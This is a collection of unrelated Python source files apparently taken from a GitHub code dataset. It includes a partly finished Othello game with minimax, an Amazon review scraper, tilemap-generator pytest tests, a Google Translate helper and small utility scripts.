j in range(size):\n for i in range(size):\n self.insert(Stone(i, j, '-'))\n\n middleLeft = int((self.size / 2) - 1)\n middleRight = int(self.size / 2)\n\n blackStoneOne = Stone(middleLeft, middleLeft, 'B')\n blackStoneTwo = Stone(middleRight, middleRight, 'B')\n self.insert(blackStoneOne)\n self.insert(blackStoneTwo)\n\n whiteStoneOne = Stone(middleLeft, middleRight, 'W')\n whiteStoneTwo = Stone(middleRight, middleLeft, 'W')\n self.insert(whiteStoneOne)\n self.insert(whiteStoneTwo)\n \n #Inserts the stone on the board at a specific row & column set in the stone's constructor\n def insert(self, stone):\n self.stones[stone.row][stone.col] = stone\n\n #Gets the stone at the row and column specified in the function\n def get_stone_at(self, row, col):\n return self.stones[int(row)][int(col)]\n\n #Returns a dictionary of stones adjacent to the stone specified in the paramter.\n #Key: Returns the direction between the stone and the neighbor\n #Value: Returns the neighbor\n #Felicia NORTH AND SOUTH MIXED\n def neighbors_of(self, stone):\n if stone.row - 1 >= 0:\n stone.neighbors.update({\"SOUTH\" : self.stones[stone.row - 1][stone.col]})\n\n if stone.row + 1 < self.size:\n stone.neighbors.update({\"NORTH\" : self.stones[stone.row + 1][stone.col]})\n\n if stone.col - 1 >= 0:\n stone.neighbors.update({\"WEST\" : self.stones[stone.row][stone.col - 1]})\n\n if stone.col + 1 < self.size:\n stone.neighbors.update({\"EAST\" : self.stones[stone.row][stone.col + 1]})\n\n if stone.row - 1 >= 0 and stone.col - 1 >= 0:\n stone.neighbors.update({\"SOUTHWEST\" : self.stones[stone.row - 1][stone.col - 1]})\n\n if stone.row - 1 >= 0 and stone.col + 1 < self.size:\n stone.neighbors.update({\"SOUTHEAST\" : self.stones[stone.row - 1][stone.col + 1]})\n\n if stone.row + 1 < self.size and stone.col - 1 >= 0:\n stone.neighbors.update({\"NORTHWEST\" : self.stones[stone.row + 1][stone.col - 1]})\n\n if stone.row + 1 < self.size and stone.col + 1 < self.size:\n stone.neighbors.update({\"NORTHEAST\" : self.stones[stone.row + 1][stone.col + 1]})\n \n return stone.neighbors\n\n #Prints the board \n def __repr__(self):\n board = \"\\n\\t Column\\nRow\\t\"\n r = 0\n \n for c in range(0, self.size):\n board += str(c) + 
\" \"\n board += \"\\n\"\n \n for col in np.array(self.stones):\n board += str(r) + \"\\t\"\n for stone in col:\n board += str(stone) + \" \"\n board += \"\\n\"\n r += 1\n return board\n#Created By Felicia based on algorithm psuedocode\n#Input: stone object, int depth, bool maxPlayer\n#Output: hueristic value assignments to legal moves for current play\ndef mini_max(board, piece, depth, maxPlayer):\n if maxPlayer == False:\n moves = legal_moves(board, 'B')\n else:\n moves = legal_moves(board, 'W')\n \n if depth == 0 or moves == None:\n return set_hueristic_value(piece)\n elif maxPlayer:\n value = -10000\n for i in moves:\n tempVal = mini_max(board, i, depth-1, False)\n if value < tempVal:\n value = tempVal\n return value\n else: #minPlayer\n value = 65\n for i in moves:\n tempVal = mini_max(board, i, depth-1, True)\n if value < tempVal:\n value = tempVal\n return value\n\n\n\n\ndef get_user_postion():\n row = input(\"Please Enter a row: \")\n col = input(\"Please Enter a column: \")\n return row, col\n\n#created by Felicia\ndef legal_moves(board, player):\n movesList = []\n opPosition = []\n endList = []\n size = 6\n if player == 'W':\n oppPlayer ='B'\n else:\n oppPlayer = 'W'\n #get a list of all of the opponents pieces\n for i in range(size):\n for j in range(size):\n stone = board.get_stone_at(i, j)\n if stone.state == oppPlayer:\n opPosition.append(stone)\n #i is a tile with an opponents stone\n for i in opPosition:\n #a list of every direction \n for pieceDir, pieceVal in i.neighbors.items():\n #indicates empty space next to opponents piece \n if pieceVal.state == '-':\n #search for flank\n #set our current piece in position\n d, row, col = get_direction(pieceDir, i.row,i.col)\n temp = board.get_stone_at(row, col)\n \n if temp.state != '-':\n while temp.state == oppPlayer and temp.row < size and temp.col < size:\n d, row, col = get_direction(pieceDir, temp.row,temp.col)\n temp = board.get_stone_at(row, col)\n if temp.state == player:\n #appends the original move as valid\n movesList.append(pieceVal)\n #appends the ending position for flipping of pieces later\n endList.append(temp)\n\n return movesList, endList\n\n#created by Felicia Helper Function for legal_moves\ndef get_direction(direction, row, col):\n headTo = \"\"\n if direction == 'SOUTHEAST':\n headTo = 'NORTHWEST'\n row = row + 1\n col = col - 1\n elif direction == 'NORTHWEST':\n headTo = 'SOUTHEAST'\n row = row - 1\n col = col + 1\n elif direction == 'NORTH':\n headTo = 'SOUTH'\n row = row - 1\n elif direction == 'SOUTH':\n headTo = 'NORTH'\n row = row + 1\n elif direction == 'EAST':\n headTo = 'WEST'\n col = col - 1\n elif direction == 'WEST':\n headTo = 'EAST'\n col = col + 1\n elif direction == 'NORTHEAST':\n headTo = 'SOUTHWEST'\n row = row - 1\n col = col - 1\n elif direction == 'SOUTHWEST':\n headTo = 'NORTHEAST'\n row = row + 1\n col = col + 1\n return headTo, row, col\n\n#Created By James\n#Function that places a stone\ndef place_stone(row, col, board, player):\n newStone = Stone(row, col, player)\n board.insert(newStone)\n\n#Created By James\n#Function that converts a row\n#TODO: make it work for diagonals\ndef convert_line(begRow, begCol, endRow, endCol, board, player):\n if begRow is endRow:\n num = begRow + 1\n while (num != endCol):\n newStone = Stone(begRow, num, player)\n board.insert(newStone)\n num += 1\n if begCol is endCol:\n num = begCol + 1\n while (num != endRow):\n newStone = Stone(num, begCol, player)\n board.insert(newStone)\n num += 1\n\n#TODO\ndef check_for_win(board):\n pass\n#TODO\ndef 
apply_move(currentStone, board):\n pass\n#TODO\ndef set_hueristic_value(currentStone):\n return 1\n#TODO\ndef get_winner(board):\n pass\n#TODO \ndef pick_best_move(moves):\n return 0,0\n#TODO a function to determine who goes 1st \n#now - human is always black and comp is white <- hardcoded in for testing ATM\n\n#Created By Felicia\n#input: None\n#Controls the game flow\ndef play_game():\n size = 6\n board = Board(size)\n for i in range(size):\n for j in range(size):\n board.neighbors_of(board.get_stone_at(i,j))\n gameInPlay = True\n #assume Player1 is Human and moving 'B' the blackstones\n player1 = False\n passedTurn = False\n \n while gameInPlay:\n print(board)\n moves = []\n #endpieces is a list of pieces that correspond with legal_moves may not need\n endpieces = []\n #players turn\n if player1 == True:\n moves, endpieces = legal_moves(board, 'B')\n #no legal moves means player forfeits turn\n if not moves:\n player1 = False\n #if the opposing player was unable to make a move the game is over\n if passedTurn == True:\n break\n else:\n passedTurn = True\n\t#otherwise get input from player\n else:\n position = False\n passedTurn = False\n while position == False:\n row,col = get_user_postion() #return x,y\n \n if int(row) < size and int(col) < size: #if it's valid\n playerMove = board.get_stone_at(row, col) \n if playerMove in moves: #if it's a legal move\n\t\t#this is function will flip over pieces, playerMove is the piece placed and in the list endpieces a corresponding tile\n\t\t# to the list moves will tell you have far to flip \n apply_move(playerMove, board) #set move on board\n position = True #next turn\n player1 = False\n if check_for_win(board) == False:\n gameInPlay = False\n #The Computers turn \n else:\n moves, endpieces = legal_moves(board, 'W')\n if not moves:\n if passedTurn == True:\n break\n else:\n passedTurn = True\n player1 = True\n else:\n passedTurn = False\n #asign hueristics\n for i in moves:\n mini_max(board, i, 3, True)\n #pick the highest value\n moveRow, moveCol = pick_best_move(moves)\n #TODO need to validate move \n compMove = board.get_stone_at(moveRow, moveCol)\n apply_move(compMove, board)\n player1 = True\n if check_for_win(board) == False:\n gameInPlay = False\n get_winner(board) \n \n\n\nif __name__ == \"__main__\":\n play_game()\n","repo_name":"rhedayat2/Project-Ominite1","sub_path":"Othello.py","file_name":"Othello.py","file_ext":"py","file_size_in_byte":9610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"17109101879","text":"import argparse\nimport Dyn_EE\nfrom datetime import date, timedelta\n\nparser = argparse.ArgumentParser()\nparser.add_argument('spread_name')\nparser.add_argument('threshold', type=int)\nargs = parser.parse_args()\n\ndef test_run():\n\tspread_name = args.spread_name\n\tthreshold = args.threshold\n\n\tend_date = date.today()\n\tstart_date = end_date - timedelta(days=60)\n\ttest_obj = Dyn_EE.Dyn_EE(spread_name, 'data/data_2018', 2.0, 0.5, threshold)\n\ttest_obj.print_SharpeRatio(start_date, end_date)\n\ttest_obj.plot_trade(start_date, end_date)\n\n\n\nif __name__ == '__main__':\n\ttest_run()","repo_name":"twangcode/simpleMA","sub_path":"backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"38795685501","text":"import selenium\nfrom selenium import webdriver\nfrom selenium.common.exceptions import *\nimport pymongo,datetime\nimport 
re\nfrom pymongo import MongoClient\nfrom log_controller import *\nlog_info(\"Selecting collection\")\n\n#connect to database\nclient = MongoClient('localhost',27017)\n#set the db object to pricetracker database\ndb = client['pricetracker']\n#set the db to TV collection\ncollection = db['amznsoundbar']\n#calling the webdriver\ndriver = webdriver.Chrome()\n#initializing different db\n#conn = MongoClient('10.56.133.12',27017)\ndb1 = client['amazon']\ncol = db1['sbreview']\ndt = datetime.datetime.now().date()\n#inserting the values into db\ndef inser(bar,model,noofreview,reviews):\n\t#doc1 = ({'brand':bar,'model':model,str(dt):{'noofreview':noofreview,'reviews':reviews}})\n\t#col.insert_one(doc1)\n\tdb1.sbreview.update_one({'brand':bar,'model':model},{\"$set\": {str(dt):{'noofreview':noofreview,'reviews':reviews}}},upsert = True)\n\tprint(\"Insert Complete\")\n#defining main function\ndef main():\n\tfor doc in collection.find({}):\n\t\t# storing the url\n\t\tresult = doc['url']\n\t\t#storing the brandname\n\t\tbar = doc['brand']\n\t\t#storing the model name\n\t\tmodel = doc['model']\n\t\tif( len(result) == 0):\n\t\t\tprint(\"NO DATA\")\n\t\telse:\n\t\t\tdriver.get(result)\n\t\t\tasin = str((driver.find_element_by_xpath('//*[@id=\"prodDetails\"]/div/div[2]/div[1]/div[2]/div/div/table/tbody/tr[1]/td[2]')).text)\n\t\t\tfor p_no in range(1,9):\n\t\t\t\tdriver.get('https://www.amazon.in/product-reviews/'+asin+'/ref=cm_cr_getr_d_paging_btm_'+str(p_no)+'?ie=UTF8&reviewerType=all_reviews&pageNumber='+str(p_no)+'')\n\t\t\t\tnoofreview = str(driver.find_element_by_xpath('//*[@id=\"cm_cr-product_info\"]/div/div[1]/div[2]/div/div/div[2]/div/span').text)\n\t\t\t\tprint(noofreview)\n\t\t\t\ttry:\n\t\t\t\t\t#rn = str(driver.find_element_by_xpath('//a[@data-hook=\"profile-name\"]').text)\n\t\t\t\t\trt = str(driver.find_element_by_xpath('//a[@data-hook=\"review-title\"]').text)\n\t\t\t\t\trd = str(driver.find_element_by_xpath('//span[@data-hook=\"review-date\"]').text)\n\t\t\t\t\trb = str(driver.find_element_by_xpath('//span[@data-hook=\"review-body\"]').text)\n\t\t\t\t\tfor r in rt,rd,rb:\n\t\t\t\t\t\treviews = r\n\t\t\t\t\t\tprint(reviews)\n\t\t\t\t\t\tinser(bar,model,noofreview,reviews)\t\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"No more reviews\")\n\t\t\t\t\tbreak\n\t\t\t\t\t\t\nif __name__ == '__main__':\n\tmain()\ndriver.quit()\nprint(\"Completed\")","repo_name":"Saurav2304/automation","sub_path":"amazon-sdreview.py","file_name":"amazon-sdreview.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"25625781659","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nfrom src.ellipsize import version\n\nsetuptools.setup(\n name=\"ellipsize\",\n version=version.VERSION,\n author=\"Andrey Sorokin\",\n author_email=\"andrey@sorokin.engineer\",\n description=\"Pretty reducing huge Python objects to visualise them nicely.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://andgineer.github.io/ellipsize/\",\n package_dir={\"\": \"src\"},\n packages=setuptools.find_packages(where=\"src\"),\n python_requires=\">=3.7\",\n keywords=\"ellipsis log print\",\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n 
],\n)\n","repo_name":"andgineer/ellipsize","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"6071999597","text":"from tilemap_generator import TileMap, Island, Biom\nimport numpy as np\nimport pytest\n\nfrom errors import InvalidMapDimensionsError, InvalidPercentError\nfrom errors import InvalidIslandSurfaceError, InvalidIslandAreaError\nfrom errors import InvalidBiomAreaError, InvalidBiomNameError\nfrom errors import InvalidBiomPatternNameError, InvalidRgbError\n\n\ndef test_create_map():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n assert mapa.map.shape == (40, 40, 3)\n assert mapa.rows == 40\n assert mapa.columns == 40\n assert mapa.final_surface == 256\n assert mapa.biom_patterns == {\n 'snow': [255, 255, 255],\n 'desert': [250, 214, 107],\n 'jungle': [22, 71, 11]}\n assert mapa.islands == []\n\n\ndef test_change_island_and_water_colour():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.island_rgb = ([22, 123, 45])\n mapa.water_rgb = ([34, 124, 200])\n assert mapa.water_rgb == [34, 124, 200]\n assert mapa.island_rgb == [22, 123, 45]\n\n\ndef test_add_biom_patterns():\n mapa = TileMap(40, 40, 40)\n assert len(mapa.biom_patterns) == 3\n mapa.add_biom_pattern('bagno', [11, 11, 11])\n assert len(mapa.biom_patterns) == 4\n assert mapa.biom_patterns['bagno'] == [11, 11, 11]\n\n\ndef test_first_tile(monkeypatch):\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n\n def get_tile(t, f):\n return 5\n monkeypatch.setattr('tilemap_generator.randint', get_tile)\n first_tile = mapa.first_tile()\n assert first_tile == (5, 5)\n assert all(c_code in mapa.water_rgb for c_code in mapa.map[(first_tile)])\n\n\ndef test_calculate_close_neighbours():\n mapa = TileMap(40, 40, 40)\n tiles = [(4, 5), (6, 5), (5, 4), (5, 6)]\n assert mapa.calculate_close_neighbours((5, 5)) == tiles\n\n\ndef test_calculate_extended_neighbours():\n mapa = TileMap(40, 40, 40)\n tiles = [(4, 4), (4, 6), (6, 4), (6, 6)]\n assert mapa.calculate_extended_neighbours((5, 5)) == tiles\n\n\ndef test_split_surface_if_surface_is_correct():\n mapa = TileMap(40, 40, 40)\n mapa.min_island_surface = 20\n islands = mapa.split_surface_beetwen_islands()\n total_surface = sum(list(islands.values()))\n assert len(islands) > 0\n assert total_surface == mapa.final_surface\n for island in islands:\n assert islands[island] >= 20\n\n\ndef test_split_surface_min_island_surface_greater_than_total():\n mapa = TileMap(40, 40, 40)\n mapa.min_island_surface = 10000\n islands = mapa.split_surface_beetwen_islands()\n total_surface = sum(list(islands.values()))\n assert len(islands) == 1\n assert total_surface == mapa.final_surface == 256\n\n\ndef test_apply_island_on_map(monkeypatch):\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n\n def surfaces(f):\n return {1: 175, 2: 8, 3: 56, 4: 17}\n monkeypatch.setattr('tilemap_generator.TileMap.split_surface_beetwen_islands', surfaces)\n mapa.apply_islands_on_map()\n assert len(mapa.islands) == 4\n assert mapa.islands[0].surface == 175\n assert mapa.islands[1].surface == 8\n assert mapa.islands[2].surface == 56\n assert mapa.islands[3].surface == 17\n\n f = None\n for island in mapa.islands:\n assert island.surface == surfaces(f)[island.index]\n assert island.surface == len(set(island.area))\n rgb = mapa.island_rgb\n for tile in island.area:\n assert all(c_code in rgb for c_code in mapa.map[(tile)])\n\n\ndef 
test_create_land_correct_colour_code():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n area = mapa.create_land(123, (20, 20))\n assert len(area) == 123\n assert (20, 20) in area\n for tile in area:\n assert all(c_code in mapa.island_rgb for c_code in mapa.map[(tile)])\n\n\ndef test_useless_tile_True():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.map[7, 7] = np.array([10, 138, 22]) # island, central tile\n mapa.map[6, 7] = np.array([10, 138, 22]) # island, up\n mapa.map[8, 7] = np.array([10, 138, 22]) # island, down\n mapa.map[7, 6] = np.array([10, 138, 22]) # island, left\n mapa.map[7, 8] = np.array([10, 138, 22]) # island, right\n assert mapa.useless_tile((7, 7)) is True\n\n\ndef test_useless_tile_False():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.map[7, 7] = np.array([10, 138, 22]) # island, central tile\n mapa.map[6, 7] = np.array([10, 138, 22]) # island, up\n mapa.map[8, 7] = np.array([10, 138, 22]) # island, down\n mapa.map[7, 6] = np.array([10, 138, 22]) # island, left\n mapa.map[7, 8] = np.array([10, 65, 148]) # island, right\n assert mapa.useless_tile((7, 7)) is False\n\n\ndef test_separate_islands(monkeypatch):\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n island_1 = Island(1, [(20, 20)], 1, 20, 50)\n mapa.islands.append(island_1)\n\n assert mapa.separate_islands((19, 19)) is False\n assert mapa.separate_islands((19, 20)) is False\n assert mapa.separate_islands((19, 21)) is False\n assert mapa.separate_islands((20, 19)) is False\n assert mapa.separate_islands((20, 21)) is False\n assert mapa.separate_islands((21, 19)) is False\n assert mapa.separate_islands((21, 20)) is False\n assert mapa.separate_islands((21, 21)) is False\n\n\ndef test_get_island_by_index():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.apply_islands_on_map()\n for island in mapa.islands:\n assert island.area == mapa.get_island_by_index(island.index).area\n\n\ndef test_delete_island(monkeypatch):\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n\n def surfaces(f):\n return {1: 175, 2: 8, 3: 56, 4: 17}\n monkeypatch.setattr('tilemap_generator.TileMap.split_surface_beetwen_islands', surfaces)\n mapa.apply_islands_on_map()\n for island in mapa.islands:\n island_area = island.area\n mapa.delete_island(island)\n for tile in island_area:\n assert all(c_code in mapa.water_rgb for c_code in mapa.map[(tile)])\n\n\ndef test_restore_island():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.apply_islands_on_map()\n island = mapa.islands[0]\n for tile in island.area:\n mapa.map[tile] = np.array([255, 5, 5])\n assert all(c_code in [255, 5, 5] for c_code in mapa.map[tile])\n mapa.restore_island(island)\n for tile in island.area:\n assert not any(c_code in [255, 5, 5] for c_code in mapa.map[tile])\n\n\ndef test_apply_biom(monkeypatch):\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n\n def surfaces(f):\n return {1: 175, 2: 8, 3: 56, 4: 17}\n monkeypatch.setattr('tilemap_generator.TileMap.split_surface_beetwen_islands', surfaces)\n\n def my_choice():\n return 0.5\n monkeypatch.setattr('tilemap_generator.random', my_choice)\n\n mapa.apply_islands_on_map()\n mapa.apply_biom()\n assert len(mapa.get_island_by_index(1).bioms) == 1\n assert len(mapa.get_island_by_index(2).bioms) == 0\n assert len(mapa.get_island_by_index(3).bioms) == 1\n assert len(mapa.get_island_by_index(4).bioms) == 1\n\n for island in mapa.islands:\n for biom in island.bioms:\n for tile in biom.area:\n assert all(c_code in biom.c_code for c_code in mapa.map[tile])\n assert 
tile in island.area\n assert len(biom.area) == len(set(biom.area))\n assert len(biom.area) == int(island.surface * 0.5)\n\n\ndef test_create_biom_correct_colour_code():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.apply_islands_on_map()\n island = mapa.islands[0]\n first_tile = island.area[0]\n mapa.create_biom(20, first_tile, [123, 45, 22])\n biom_surface = 0\n for tile in island.area:\n if all(c_code in [123, 45, 22] for c_code in mapa.map[tile]):\n biom_surface += 1\n assert biom_surface == 20\n\n\ndef test_delete_biom(monkeypatch):\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n\n def surfaces(f):\n return {1: 175, 2: 8, 3: 56, 4: 17}\n monkeypatch.setattr('tilemap_generator.TileMap.split_surface_beetwen_islands', surfaces)\n\n mapa.apply_islands_on_map()\n mapa.apply_biom()\n assert len(mapa.get_island_by_index(1).bioms) == 1\n assert len(mapa.get_island_by_index(2).bioms) == 0\n assert len(mapa.get_island_by_index(3).bioms) == 1\n assert len(mapa.get_island_by_index(4).bioms) == 1\n\n for island in mapa.islands:\n mapa.delete_biom(island)\n assert len(island.bioms) == 0\n for tile in island.area:\n assert all(c_code in mapa.island_rgb for c_code in mapa.map[tile])\n\n\ndef test_str():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.apply_islands_on_map()\n text = f'{\"TileMap: 1600 tiles\"}\\n'\n text += f'{\"Total islands surface: 256 tiles\"}'\n assert str(mapa) == text\n\n\ndef test_return_image():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n assert type(mapa.return_image()) == bytes\n\n\ndef test_Island_create():\n island = Island(2, [(20, 10), (21, 10)], 1, 0.2, 1)\n assert island.surface == 2\n assert island.area == [(20, 10), (21, 10)]\n assert island.index == 1\n assert island.bioms == []\n assert island.percent_map == 0.2 * 100\n assert island.percent_island == 1 * 100\n\n\ndef test_Island_description():\n biom = Biom('pustynia', [(1, 2)], None, [12, 12, 12])\n island = Island(2, [(20, 10), (21, 10)], 1, 0.2, 1)\n island.bioms.append(biom)\n\n text = ''\n text += f'{\"This is the biggest island on map\"}\\n'\n text += f'{\"Surface of an island is 2 tile/s\"}\\n'\n text += f'{\"The island fills 20.00% of whole map\"}'\n text += f'{\" and 100.00% of all islands\"}\\n'\n text += f'There is a biom \"pustynia\" on the island\\n'\n text += f'{\"Surface of the biom is 1 tile/s\"}\\n'\n text += f'{\"The biom takes 50.00% of the island\"}\\n'\n assert text == island.description()\n\n\ndef test_Island_str():\n island = Island(2, [(20, 10), (21, 10)], 1, 0.2, 1)\n assert str(island) == f'{\"Island No. 
1\"}'\n\n\ndef test_Biom_create():\n island = Island(2, [(20, 10), (21, 10)], 1, 0.2, 1)\n biom = Biom('pustynia', [(1, 2)], island, [234, 12, 45])\n assert biom.name == 'pustynia'\n assert biom.area == [(1, 2)]\n assert biom.island == island\n assert biom.c_code == [234, 12, 45]\n\n# ERRORS TESTING\n\n\ndef test_create_map_negative_dimentions():\n with pytest.raises(InvalidMapDimensionsError):\n TileMap(-20, 30, 20)\n\n\ndef test_create_map_negative_density_percent():\n with pytest.raises(InvalidPercentError):\n TileMap(20, 30, -20)\n\n\ndef test_add_biom_pattern_not_str_name():\n mapa = TileMap(20, 30, 20)\n with pytest.raises(InvalidBiomPatternNameError):\n mapa.add_biom_pattern(3, [233, 23, 24])\n\n\ndef test_add_biom_pattern_rbg_colour_code_negative():\n mapa = TileMap(20, 30, 20)\n with pytest.raises(InvalidRgbError):\n mapa.add_biom_pattern('a', [12, -22, 10])\n\n\ndef test_add_biom_pattern_rbg_colour_code_not_list():\n mapa = TileMap(20, 30, 20)\n with pytest.raises(InvalidRgbError):\n mapa.add_biom_pattern('a', (10, 22, 33))\n\n\ndef test_add_biom_pattern_rbg_colour_code_Invalid_component_number():\n mapa = TileMap(20, 30, 20)\n with pytest.raises(InvalidRgbError):\n mapa.add_biom_pattern('a', [12, 10])\n\n\ndef test_create_island_negative_surface():\n with pytest.raises(InvalidIslandSurfaceError):\n Island(-2, [(20, 10), (21, 10)], 1, 0.2, 1)\n\n\ndef test_create_island_surface_not_int():\n with pytest.raises(InvalidIslandSurfaceError):\n Island([20], [(20, 10), (21, 10)], 1, 0.2, 1)\n\n\ndef test_create_island_empty_area():\n with pytest.raises(InvalidIslandAreaError):\n Island(2, [], 1, 0.2, 1)\n\n\ndef test_create_island_area_not_list():\n with pytest.raises(InvalidIslandAreaError):\n Island(2, (20, 32), 1, 0.2, 1)\n\n\ndef test_create_biom_name_not_str():\n with pytest.raises(InvalidBiomNameError):\n Biom(1, [(1, 2)], None, [234, 12, 45])\n\n\ndef test_create_biom_area_not_list():\n with pytest.raises(InvalidBiomAreaError):\n Biom('a', (23, 24), None, [234, 12, 45])\n\n\ndef test_create_biom_area_empty_list():\n with pytest.raises(InvalidBiomAreaError):\n Biom('a', [], None, [234, 12, 45])\n\n\ndef test_create_biom_c_code_negative():\n with pytest.raises(InvalidRgbError):\n Biom('a', [23, 24], None, [-234, 12, 45])\n\n\ndef test_create_biom_c_code_not_list():\n with pytest.raises(InvalidRgbError):\n Biom('a', [23, 24], None, (-234, 12, 45))\n\n\ndef test_create_biom_c_code_list_invalid_components_number():\n with pytest.raises(InvalidRgbError):\n Biom('a', [23, 24], None, [12, 45])\n","repo_name":"WroblewskiAdam/TileMap-Generator","sub_path":"test_tilemap_generator.py","file_name":"test_tilemap_generator.py","file_ext":"py","file_size_in_byte":12544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"14628580240","text":"class Solution(object):\n def lengthOfLIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n dp = [1] * len(nums)\n for cur, val in enumerate(nums):\n for i in range(cur):\n if val > nums[i]:\n dp[cur] = max(dp[i] + 1, dp[cur])\n return max(dp)\n","repo_name":"peinanteng/leetcode","sub_path":"longestIncreasingSubsequence.py","file_name":"longestIncreasingSubsequence.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22787433712","text":"\"\"\"\r\ntranslate.py\r\n\r\nTranslates strings using Google Translate\r\n\r\nAll input and output is in 
unicode.\r\n\"\"\"\r\n\r\n__all__ = ('source_languages', 'target_languages', 'translate')\r\n\r\nimport sys\r\nimport urllib,logging\r\nfrom google.appengine.api import urlfetch\r\nfrom BeautifulSoup import BeautifulSoup\r\nfrom django.utils import simplejson as json\r\nbase_uri = \"http://ajax.googleapis.com/ajax/services/language/translate\"\r\n\r\ndefault_params = {'v': '1.0'}\r\n\r\ndef translate_ajax(sl, tl, phrase):\r\n assert type(phrase) == type(u''), \"Expects input to be unicode.\"\r\n args = default_params.copy()\r\n args.update({\r\n 'langpair': '%s%%7C%s' % (sl, tl),\r\n 'q': urllib.quote_plus(phrase.encode('utf-8')),\r\n })\r\n argstring = '%s' % ('&'.join(['%s=%s' % (k,v) for (k,v)in args.iteritems()]))\r\n url = base_uri + '?'+ argstring\r\n try:\r\n response=urlfetch.fetch(url)\r\n if response.status_code==200:\r\n resp = json.loads(response.content)\r\n# logging.info(resp)\r\n if resp['responseStatus']==200 and resp['responseData']['translatedText'] is not u'':\r\n return resp['responseData']['translatedText']\r\n else:\r\n return None\r\n else:\r\n return None\r\n except:\r\n return None\r\n\r\n\r\n\r\ndef translate(sl, tl, text):\r\n\r\n assert type(text) == type(u''), \"Expects input to be unicode.\"\r\n\r\n # Do a POST to google\r\n\r\n # I suspect \"ie\" to be Input Encoding.\r\n # I have no idea what \"hl\" is.\r\n\r\n translated_page = urlfetch.fetch(\r\n url=\"http://translate.google.com/translate_t?\" + urllib.urlencode({'sl': sl, 'tl': tl}),\r\n payload=urllib.urlencode({'hl': 'en',\r\n 'ie': 'UTF8',\r\n 'text': text.encode('utf-8'),\r\n 'sl': sl,\r\n 'tl': tl}),\r\n method=urlfetch.POST,\r\n headers={'Content-Type': 'application/x-www-form-urlencoded'}\r\n )\r\n\r\n if translated_page.status_code == 200:\r\n translated_soup = BeautifulSoup(translated_page.content)\r\n return translated_soup('div', id='result_box')[0].string\r\n else:\r\n return \"\"\r\n","repo_name":"Homoni/pyideas","sub_path":"geotwitter/utility/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"73544166701","text":"import dolfin as df\nfrom .model_base import ModelBase\n\n\nclass Model(ModelBase):\n \"\"\" Problem with input zone in the middle. \"\"\"\n\n def __init__(self, mesh, L, t_PDE, j_in_const, stim_start, stim_end):\n ModelBase.__init__(self, mesh, L, t_PDE)\n self.stim_start = stim_start # time of input onset (s)\n self.stim_end = stim_end # time of input being turned off (s)\n self.j_in_const = j_in_const # constant input in input zone (mol/(m^2s))\n\n def j_in(self, t):\n \"\"\" Constant input. \"\"\"\n\n L_in = 0.1*self.L # length of input zone (m)\n L1 = self.L/2-L_in/2\n L2 = self.L/2+L_in/2\n\n j = df.Expression('j_in*(x[0] > L1)*(x[0] < L2)*(t >= tS)*(t <= tE)',\n L1=L1, L2=L2, j_in=self.j_in_const, t=t,\n tS=self.stim_start, tE=self.stim_end, degree=1)\n\n return j\n\n def j_dec(self, K_e):\n \"\"\" Decay flux proportional to [K]_e. \"\"\"\n\n k_dec = df.Constant(2.9e-8) # decay factor for [K]_e (m/s)\n\n j = - k_dec*(K_e - float(self.K_e_init))\n\n return j\n\n def set_input_fluxes(self, w):\n \"\"\" Set input fluxes. 
